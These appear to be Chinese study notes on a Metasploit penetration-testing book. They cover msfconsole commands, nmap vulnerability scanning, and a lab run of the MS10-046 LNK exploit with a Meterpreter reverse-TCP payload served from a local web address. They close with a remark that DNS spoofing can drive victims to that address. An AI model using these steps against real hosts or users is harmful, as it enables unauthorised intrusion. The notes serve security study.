预览加载中,请您耐心等待几秒...
1/10
2/10
3/10
4/10
5/10
6/10
7/10
8/10
9/10
10/10

在线预览结束,喜欢就下载吧,查找使用更方便

如果您无法下载资料,请参考说明:

1、部分资料下载需要金币,请确保您的账户上有足够的金币

2、已购买过的文档,再次下载不重复扣费

3、资料包下载后请先用软件解压,在使用对应软件打开

唐僧笔记 取经之路技术交流群:161810021 Metasploit渗透测试指南读书笔记第五章 渗透攻击之旅 5.1渗透攻击基础 5.1.1msf>showexploits 这个命令会显示Metasploit框架中所有可有的渗透攻击模块。 5.1.2msf>showauxiliary 这个命令会显示所有的辅助模块以及它们的用途。在Metasploit中,辅助模块的用途非常广泛,它们可以是扫描器,拒绝服务攻击工具,fuzz测试器,以及其他类型的工具。 5.1.3msf>showoptions 参数(options)是保证Metasploit框架中各个模块正确运行所需要的的各种设置。当你选择了一个模块,并输入showoptions后,会列出各种参数,没选择模块它会列出所有的全局参数 输入back返回到上一个状态 搜索(search),当你不知道模块路径时它就起作用了。 5.14msf>showpayloads 查看所有的活动状态的攻击载荷 这里我们选择payloadwindows/shell/reverse_tcp Reverse_tcp(反弹式tcp连接) 5.15msf>showtargets 列出漏洞影响目标系统的类型。 注:0是自动攻击 5.1.6info 使用info命令加上模块的名字来显示此模块的详细信息,参数说明以及所有可用的目标系统。(这没什么用,不多介绍了) 5.1.7set和unset 模块中参数只有两个状态:已设置(set)或者未设置(unset)。 有些参数被标记为必填项(required)这样的参数必须经过手工设置并处于启用状态。 使用showoptions命令可用查看那些参数是必填。 使用set命令可以对某个参数进行设置(同时启用改参数) 使用unset命令可以禁用相关参数。 5.1.8setg和unsetg 这两个命令能够对全局参数进行设置或清除。 5.1.9save 在使用setg命令对全局参数进行设置后,可以使用save命令将当前的设置保存下来 5.2你的第一次渗透攻击 第一步扫描,呵呵! 这里全部按照书上来会失败的,看吧! Traceroutedoesnotsupportidleorconnectscan 不支持连接扫描,但书上确实是这样扫描出来的。 那怎么办了??是不是就放弃了,呵呵!不。这里我们不要进入msf这 个框架扫描,直接在外面扫。 看见最下面一行么,likely呵呵!MS08-067:VULNERABLE 这说明存在这个漏洞 下面我们来了解一下那个nmap的参数吧! - -sT是指隐秘的TCP连接扫描(StealthTCPconnect) -sS隐秘的TCPSyn扫描 -A是指高级的操作系统探测功能(advanceOSdetection) -PO[protocollist]:IPProtocolPing列出开放的端口 --script=smb-check-vulns调用nmap的插件 既然有漏洞,那我们就来尝试下,看看能不能拿下这台主机吧! 呵呵!知道这是为什么吗??这个刚刚我们保存的(5.1.9时save) 那我们就简单,设置一下参数吧! 这是参数的设置。 这里应该会不成功,因为我的虚拟机安装的是GHost的系统,它自带了一些补丁,08年的洞,这个补丁应该打上了。 如我预料,看最后一行,不能创建会话,是吧! 这里我拿另外一个漏洞吧!Ms10-046(MicrosoftWindowsShellLNKCodeExecution),这个可以我试过,呵呵! 不记得了找一下吧! 出来了。 msf>useexploit/windows/browser/ms10_046_shortcut_icon_dllloader 选择攻击模块 setPAYLOADwindows/meterpreter/reverse_tcp 攻击载荷,这里选择反弹式tcp连接 设置参数,运行攻击。 这个时候只要是有主机打开http://192.168.137.60:80/这个地址就有可能挂了。 看吧!打开浏览器输入网址就成了这样了,这说明成功。 我打开了两下,所有有两个会话。 看见了吧!这个主机挂了。 注:sessions-i会话的id这样就进去了。 有的我就没多写了,你们可以打问号就知道参数的意思了。 你可能会问,别人为什么要打开这个Url地址了,不打开不就没事么! 是的,不打开这个网址是没没事。但有一点你一定会打开网站,这点毋庸置疑 是吧!只要你打开网站你就挂了,这里就涉及到了dns欺骗。 Dns欺骗请看这里,我这就不多说了。 HYPERLINK"htt